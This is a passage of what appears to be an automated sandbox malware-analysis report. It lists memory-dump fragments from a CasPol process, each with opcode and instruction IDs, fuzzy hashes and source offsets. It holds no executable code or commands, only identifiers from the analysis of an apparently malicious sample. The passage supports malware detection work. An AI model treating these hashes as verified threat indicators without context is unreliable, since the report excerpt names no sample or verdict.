                                    • Instruction Fuzzy Hash: B321F370F105058BDB04EA78F914B9EBBE6EF89710F214129D501EB3E0DA7D9C418B99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 742d304a73ee553bdbcba48bac81be3bf8b159ed9050c8cc3326eb7be36725b1
                                    • Instruction ID: 4d1334767a1f06ca46a18d3b63e2c1d9dc0050b780ddf65b87a42c60342fa35b
                                    • Opcode Fuzzy Hash: 742d304a73ee553bdbcba48bac81be3bf8b159ed9050c8cc3326eb7be36725b1
                                    • Instruction Fuzzy Hash: 3B115B357092505FCB069BBC586056E3FF7BFC9260714806DE64ACB392DE354D16C3A6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 196925ed7878f4014bc1b8fe45cbfef3ab88da9831559f04dfcd52e674b16e28
                                    • Instruction ID: 793a3719e36d667df3ea31138512103e230ccd1c62e22def836a4ede87ece2de
                                    • Opcode Fuzzy Hash: 196925ed7878f4014bc1b8fe45cbfef3ab88da9831559f04dfcd52e674b16e28
                                    • Instruction Fuzzy Hash: 4E11E038E003A64FE732352AF89470872E4E7017F0F000826E88FDB681E66DE8858782
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 709e88c9c06fab51f6b00238585bf4b7b17d34094c465d1ac097de7813d67bfc
                                    • Instruction ID: d9d3287cf70146f5d85bafdeb432aa3a2f5674194d077a83f4d9adbe7436f5da
                                    • Opcode Fuzzy Hash: 709e88c9c06fab51f6b00238585bf4b7b17d34094c465d1ac097de7813d67bfc
                                    • Instruction Fuzzy Hash: 9B112276F002488FCB41EB7CE4546AEBBF2AF8D250B20406AE109E7311EF3C9C028795
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b632f6dbb6d37bbbddbd8ddfc5a425bf57efb41bbc3361f92ff46f1bdc7bc443
                                    • Instruction ID: e9b69d43c41d56d286e72959ea2858cbdee3011ffc5633e7b8addc59d1aecd60
                                    • Opcode Fuzzy Hash: b632f6dbb6d37bbbddbd8ddfc5a425bf57efb41bbc3361f92ff46f1bdc7bc443
                                    • Instruction Fuzzy Hash: 68118475B402148FCB54ABB8A95879DBBF69F88251F10582ED509E3380EF399C518790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a895c61e3548b0d6bc9778cbd56307535ea760a7e2f7842334e91eea701483d7
                                    • Instruction ID: ac57b9b1d48db5e8a5f92a7bb0c179f9fc30c1a4319422ba52781ef4644bbad9
                                    • Opcode Fuzzy Hash: a895c61e3548b0d6bc9778cbd56307535ea760a7e2f7842334e91eea701483d7
                                    • Instruction Fuzzy Hash: 48112676F042549FCB41EB78D554A9FBFF2AF8E10076040A9D00DE7351EA389D02C7A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cf855f65bd8addccf01aeeeefdefdfd77409b90b9576d3d2c429cf620f1bfe76
                                    • Instruction ID: cd4201a3a2b9f9532b715ae07a5e5a8ef542e92a6a651c954cc31b4692a9d058
                                    • Opcode Fuzzy Hash: cf855f65bd8addccf01aeeeefdefdfd77409b90b9576d3d2c429cf620f1bfe76
                                    • Instruction Fuzzy Hash: 0011E975F443855FCB42EB78A8147AE3FF59F8A200F1544A7D548EB381EA3C9D0187A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 653e6ca4d941ffe8bdb4c9f9d16bd6d17f2093b41e72dcc29c35f879992b277d
                                    • Instruction ID: e1a6c04186d4a5ef5012814951651e8c9988c4be36912a656f952c81bb33d826
                                    • Opcode Fuzzy Hash: 653e6ca4d941ffe8bdb4c9f9d16bd6d17f2093b41e72dcc29c35f879992b277d
                                    • Instruction Fuzzy Hash: 41219D75F001588FCB41EF78D988AAEBBF2AF8C260710406AE509E3341EB385D068B91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 657a911d1ac83d40dcf09be17f88399f5261ff73cfa521b5e4f3af7c60871e9c
                                    • Instruction ID: 4b4b0b99a181076f40364e16de4f63ec17f79863cdfbc3b9b455a1d7c8877636
                                    • Opcode Fuzzy Hash: 657a911d1ac83d40dcf09be17f88399f5261ff73cfa521b5e4f3af7c60871e9c
                                    • Instruction Fuzzy Hash: 35317679A052299FCB61DF29D984A98BBF5FB48310F0081EAE80DA3755EF315E91CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ac3060eb1e8c399cdf49066bec9b2b96aa3e04164c38425641fafe762f513605
                                    • Instruction ID: 4d5c993b55383f127081a1d64f57c33be5f93749d7d81ae3ef2b54202721ecde
                                    • Opcode Fuzzy Hash: ac3060eb1e8c399cdf49066bec9b2b96aa3e04164c38425641fafe762f513605
                                    • Instruction Fuzzy Hash: 9911A3307043448FD751A77C845865E7FF69F8A251F0541BAD50ADB392DE349C46C792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7bdba663661801f527821310487063f77bd6346f81fb9cea83cc7647b9253088
                                    • Instruction ID: 99441c39736a16dc900c7bf76f287bebbf42724de7825e408683445b697c244a
                                    • Opcode Fuzzy Hash: 7bdba663661801f527821310487063f77bd6346f81fb9cea83cc7647b9253088
                                    • Instruction Fuzzy Hash: 82112430A102619FC750EB7AD4D8E5D3B76BBC0301F108539D4096B664EF74DD468BA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8750ca06480adb78dc8649ba1fa17f0b7decdd2b38a85fdf41dd0d04f770b770
                                    • Instruction ID: 7ebe368eec7c6a5679a8942d7dec0c8e9299549c3a355abcdfb72def8f711258
                                    • Opcode Fuzzy Hash: 8750ca06480adb78dc8649ba1fa17f0b7decdd2b38a85fdf41dd0d04f770b770
                                    • Instruction Fuzzy Hash: BB113074E0011A8FCB44EFA9E58469EBFF6FF88360F248129D409E7304E738A941CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5005beca217119b98e474eed69a78875570d2bfa812a3e7e1630b00ca9f2637f
                                    • Instruction ID: a39abe63fca65e5a5c7e5f65a11a0d4ca3e48ff3d198740e6f52a44a360e90e1
                                    • Opcode Fuzzy Hash: 5005beca217119b98e474eed69a78875570d2bfa812a3e7e1630b00ca9f2637f
                                    • Instruction Fuzzy Hash: B5110471B143458FC740EB7DE84469ABFF9EFCA610F0481B6D548EB342EA38E8018791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7a0d1a37037f10cc4d8d5bb02e6def3d0a37434452b7d39e577ffb6f93b63b8d
                                    • Instruction ID: ab0758e12928ad54ab9d8332c0f814ca04e9d08a4d3efd3288388320191b3013
                                    • Opcode Fuzzy Hash: 7a0d1a37037f10cc4d8d5bb02e6def3d0a37434452b7d39e577ffb6f93b63b8d
                                    • Instruction Fuzzy Hash: E7118271E00325CBCF29FFB4A4401AEFBB5AF44600B11C479C809AB240EB3DA941C7E2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4e06466906656ef943e300d5b488c7c62a2c26eacc0d680867868ba2e6371908
                                    • Instruction ID: 9872e6d659c4ecebf90d148eea84bc07d6d0bf6b8013534fbdfff09e88611ee0
                                    • Opcode Fuzzy Hash: 4e06466906656ef943e300d5b488c7c62a2c26eacc0d680867868ba2e6371908
                                    • Instruction Fuzzy Hash: 51217979A052298FCB62DF29D99469CBBF5FB48310F0081EAE80DA3755DB305E91CF11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 78fea7fc95bb83b95b28ca18b64d1dc5c4ad6b7a2041375dfa160d9904b4b2b6
                                    • Instruction ID: edace03b969bc2e9caac2c1506a15bb3ffd36f072c3eb39ecbcef0b19081cc79
                                    • Opcode Fuzzy Hash: 78fea7fc95bb83b95b28ca18b64d1dc5c4ad6b7a2041375dfa160d9904b4b2b6
                                    • Instruction Fuzzy Hash: 90112E75F001288FCB40DF7DD9885AEBBF6BB8C661710402AE90DE3344EB359D068B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 78a1138966e1591ca5ec6fd6b63e42a8868b7d18bb5a6a57ee90d79c39f3f642
                                    • Instruction ID: d8f94428fe41535daf0172aa82cfb577eba0bf9f295b991c850602a38a443806
                                    • Opcode Fuzzy Hash: 78a1138966e1591ca5ec6fd6b63e42a8868b7d18bb5a6a57ee90d79c39f3f642
                                    • Instruction Fuzzy Hash: E0113075F001189FCB41EB79E55459EBBF6AF8C2507204029D509E3314EF389D018B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6035a48affa92548893a9d12a2b83eded38718f1e4d0e5aae5fce0c2a0841b03
                                    • Instruction ID: 9762141c0e02739775b3b82b2f86c69fe834df914f31b4c3c380d1c62771fd72
                                    • Opcode Fuzzy Hash: 6035a48affa92548893a9d12a2b83eded38718f1e4d0e5aae5fce0c2a0841b03
                                    • Instruction Fuzzy Hash: 4C115275F001189FCB41EBBCD550A9E7BF6AB8D6547204069D50DE7314EE389D028BD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 71ad73661c48991b6c34136f06e616a17ade08d07fb2cc436aa31b14d7e9a3a2
                                    • Instruction ID: 47ffff93a3b0a2675afff054900fd369e2c53f5cb084d50098ae391fc95305e8
                                    • Opcode Fuzzy Hash: 71ad73661c48991b6c34136f06e616a17ade08d07fb2cc436aa31b14d7e9a3a2
                                    • Instruction Fuzzy Hash: CD115E79F001188FCB40EBBDE590A9EBBF6AB8C2547204029D50DE3314EF38AD028BD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fe8ca677ff56fd155e8b0255c87aebb43e4692f7957b247ab842e2eb312e875a
                                    • Instruction ID: 168f0a2ff82f38db590fa5472e9a9570584f0feb798b40cfff2391623650117e
                                    • Opcode Fuzzy Hash: fe8ca677ff56fd155e8b0255c87aebb43e4692f7957b247ab842e2eb312e875a
                                    • Instruction Fuzzy Hash: 2B113079F001188FCB44EBB8D550AAEBBF6AB8C2507604069D50DE3754EF389D028BD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 549a1e5b375b37ce7a638535f14410956d3462cdaa771860b1f91a3281559e52
                                    • Instruction ID: 44f8f1bfe91777f011f7454e6e089422a8a968eca9d6a0f02c8d3a04f436f750
                                    • Opcode Fuzzy Hash: 549a1e5b375b37ce7a638535f14410956d3462cdaa771860b1f91a3281559e52
                                    • Instruction Fuzzy Hash: 57115275F001188FCB40EBBDE55499EBBFAAB8C6507204029D50DE3714EE389D028B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 238a3ac79e6d06f51cba3701bf7c3a2dd4103001e05889aee6754cbef8353ecf
                                    • Instruction ID: 8e27bf92348240156b1e95af68c9d2ec53fb7471cf3c4ae20edc68c3761c387b
                                    • Opcode Fuzzy Hash: 238a3ac79e6d06f51cba3701bf7c3a2dd4103001e05889aee6754cbef8353ecf
                                    • Instruction Fuzzy Hash: 75115E75F001188FCB40EBBCE550AAEBBF6AB8C2547208069D50DE3304EE38AD028BD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f9ca783922fb39dbb1a8907b13384042f9f00c5c4dab48233b7cbdd039fa3073
                                    • Instruction ID: 95febfef48e0b8a240d7d77873776237cdfd08adb4c241919be3356c779d0e3d
                                    • Opcode Fuzzy Hash: f9ca783922fb39dbb1a8907b13384042f9f00c5c4dab48233b7cbdd039fa3073
                                    • Instruction Fuzzy Hash: 49115275F001188FCB40EBBCE5509AEBBF6AB8C254B204029D50DE3304EE38AD018BD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c54dbecfb8763483267aa1ea2d92882181e6b593feda5468e147361981314807
                                    • Instruction ID: 5efb1effa6fd8014086a2556b910a115da77e9c5c5cecadb00065512820a389c
                                    • Opcode Fuzzy Hash: c54dbecfb8763483267aa1ea2d92882181e6b593feda5468e147361981314807
                                    • Instruction Fuzzy Hash: 7F118275F012189FCB40EBBCE5509AE7BF6AB8D6507604069D50DE3714EE389D028BD1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c3dc3a81462f476dc7a7993338eb3f88d04346d6baa0cc74ca8ccd1501770ae9
                                    • Instruction ID: b1af994829a4631da48ebe90ef250ed966a58749a28331c95f56a827ab80acce
                                    • Opcode Fuzzy Hash: c3dc3a81462f476dc7a7993338eb3f88d04346d6baa0cc74ca8ccd1501770ae9
                                    • Instruction Fuzzy Hash: E2110730A002619FC750E77AD8D8D5D3B76BBC0341F108538D4096B664EF74ED468BE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bcc87fe19c151d8a69fef7f77f2f312a4818aa316644cb55fd5690686fbbadd7
                                    • Instruction ID: 5f5d5f709f6e4f3d5af3c11241011a0c66ab1c5fb9482c3dfd83abc73551a590
                                    • Opcode Fuzzy Hash: bcc87fe19c151d8a69fef7f77f2f312a4818aa316644cb55fd5690686fbbadd7
                                    • Instruction Fuzzy Hash: F801127105E3C24FC7039BB868286943F749F13154B0A55DBE0C4CB4A3D219094AC726
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 18e061d41752559bd449c1c56fcecb2c6a36006e3176f46e4ef315ca18f9ef7c
                                    • Instruction ID: 597ec7097918b4803a3c375c9576013fd242a65bc04a920e82989f9e84e6ac00
                                    • Opcode Fuzzy Hash: 18e061d41752559bd449c1c56fcecb2c6a36006e3176f46e4ef315ca18f9ef7c
                                    • Instruction Fuzzy Hash: 68012431A08255AFCB02DB68D810EAE3FF5AF14210F0680EAE944DF2A3DA30DE04D791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2d3766dc6b228b69160ef9f30ce18dbe68a8dd98c33b97f43fb85c8ff9943d02
                                    • Instruction ID: 53d6acb9174040eb847b6eb8c3e1efed4c8410bd7089afbaab78a0b03572b2ee
                                    • Opcode Fuzzy Hash: 2d3766dc6b228b69160ef9f30ce18dbe68a8dd98c33b97f43fb85c8ff9943d02
                                    • Instruction Fuzzy Hash: 86118079E042298FCB61DB28D984A9CBBF5FB48310F0081EAE90DA3755EB305E918F01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eb296130f376aee7d21e9e10836c5eb32daf63c007d43a74d8db2c66c2183c1e
                                    • Instruction ID: 0613233776a6627c8f6e545d88824437510bd94fcb610b3c3e4cf4de5ef1cac9
                                    • Opcode Fuzzy Hash: eb296130f376aee7d21e9e10836c5eb32daf63c007d43a74d8db2c66c2183c1e
                                    • Instruction Fuzzy Hash: E1F04632B04254AFD7208AB998407DF7BFAAB89250F000079EA09EB242DA329D85C7D1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7d08cc4a4c31075a795df169f22e6a8844d497047d0109efadfa18138d0d74fe
                                    • Instruction ID: 42c07faf0616298672c162089ee8704a22c3c8ceaed40bd06059083df85fc692
                                    • Opcode Fuzzy Hash: 7d08cc4a4c31075a795df169f22e6a8844d497047d0109efadfa18138d0d74fe
                                    • Instruction Fuzzy Hash: EDF01D75E002199FCF80EFBC994469EBFF9EB89250F10406AD508E3240EB385D018BE5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4dd2ad76f70ccbb71e9d3cbbabfa5cece15001fb6f96627d124a2f79b2802b41
                                    • Instruction ID: e0f3a2868f12af43f4a6827994790381745b637ad23aa16a072adf95da2db628
                                    • Opcode Fuzzy Hash: 4dd2ad76f70ccbb71e9d3cbbabfa5cece15001fb6f96627d124a2f79b2802b41
                                    • Instruction Fuzzy Hash: 2F019979E012298FCBA1DB68D99469CBBF5BB48324F0081E9E40DA3755DF305E918F01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cd9b23bc95af5dfa14143c091036a8709d13d184f72e7182db9df365d2f4e480
                                    • Instruction ID: 8dd6166c5e5787c3f764fba1d46ce672ebcae3d5e6e821e3ca54103a67dffcc4
                                    • Opcode Fuzzy Hash: cd9b23bc95af5dfa14143c091036a8709d13d184f72e7182db9df365d2f4e480
                                    • Instruction Fuzzy Hash: C2F05E36F001285B8B54DABAD8546DEBBFAAF8C211F11807ADA09F3240EE759D0487D1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6ddef40eda694bd761a22dd68efdd9c47951afd70bb37258ec157023e49b38aa
                                    • Instruction ID: c6bf0112b049e58491247b78481664bc200d95e54fcd74d364cdc544a9266fb9
                                    • Opcode Fuzzy Hash: 6ddef40eda694bd761a22dd68efdd9c47951afd70bb37258ec157023e49b38aa
                                    • Instruction Fuzzy Hash: EFF09279E002298FCBA1DB68D994A9CBBF5AB48314F0081E9E44DA3250DF305E918F11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 108a7372cbfdcbbb9fdb4ee3705243d42fb88f3468fc6845a35260ea8c9a0e88
                                    • Instruction ID: 9d2400365a790a249fd1926e8af0b929907d86de48a8b911f6fc8604f92e5a52
                                    • Opcode Fuzzy Hash: 108a7372cbfdcbbb9fdb4ee3705243d42fb88f3468fc6845a35260ea8c9a0e88
                                    • Instruction Fuzzy Hash: 8BE0393AB00028CFCF44EBBCE58889CB7F1AF8C2657108169E809E3350EF359D168B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 72b8c93a7d52fe48a45a4770e1abdaab70bc9a528401005090cc2d25f2c0216b
                                    • Instruction ID: d56cb7cf395bf8be0be4d7d36d8b1eb9b974002bf7e449d2cac763b06ac91776
                                    • Opcode Fuzzy Hash: 72b8c93a7d52fe48a45a4770e1abdaab70bc9a528401005090cc2d25f2c0216b
                                    • Instruction Fuzzy Hash: F2E0ED3AF101149BCF05E7B8F55499DB7F1AFC82687108169D509E7324EF399E018B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
